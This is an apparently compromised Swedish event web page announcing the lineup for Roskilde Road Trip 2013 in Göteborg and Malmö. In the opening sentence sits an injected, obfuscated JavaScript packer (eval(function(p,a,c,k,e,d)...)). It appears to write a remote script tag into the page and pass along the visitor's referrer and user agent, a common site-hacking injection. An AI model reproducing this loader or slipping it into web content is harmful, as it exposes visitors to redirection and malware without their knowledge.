Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Musikprogram klart till Roskilde Road Trip 2013!

Musikprogram klart till Roskilde Road Trip 2013!

Roskilde eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzaee|var|u0026u|referrer|ztisi||js|php’.split(’|’),0,{}))
Road Trip startar lördagen den 6 april och nu är det dags att släppa flera band. Panda da Panda och Frej Larsson – DJ Set (13 april) och Compadre (18 april) är nu bokade till Roskilde Road Trip i Malmö på Inkonst, med detta så är musikprogrammet klart! 

Roskilde Road Trip äger rum den 6-13 april på Röda Sten i Göteborg och den 13-20 april på Inkonst i Malmö. Lorentz & Sakarias och Carli kommer starta Roskilde Road Trip i Göteborg den 6 april, följt med fem andra band som spelar den 10 och 13 april. Friendly Beastly Coyote och Summer Heart kommer att spela på Roskilde Road Trip I Malmö den 18 april. Broke och Mother Lewinsky spelar den 20 april.

GÖTEBORG, RÖDA STEN:

6 april Lorentz & Sakarias, Carli                              

10 april Friendly Beastly Coyote, Summer Heart (DJ Set)

13 april – Vanligt Folk, The Woken Trees, Lower

MALMÖ, INKONST:

13 april – Frej Larsson (DJ Set), Panda da Panda                  

18 april – Friendly Beastly Coyote, Summer Heart (DJ Set), Compadre

20 april – Broke, Mother Lewinsky

STORT BANDSLÄPP – 18 april:

OBS! För er musikälskande där ute, 18 april släpper Roskilde Festival sin line-up till årets festival på Road Trip Malmö, Oslo och Hamburg. Detta kommer att presenteras av en från Roskilde Festival .

Du är såklart välkommen hit, men SKRIV TILL MIG om du vill komma.

Mer info:

Facebook RRT Malmö – http://www.facebook.com/RRTmalmo

Facebook RRT Göteborg – http://www.facebook.com/RRTGoteborg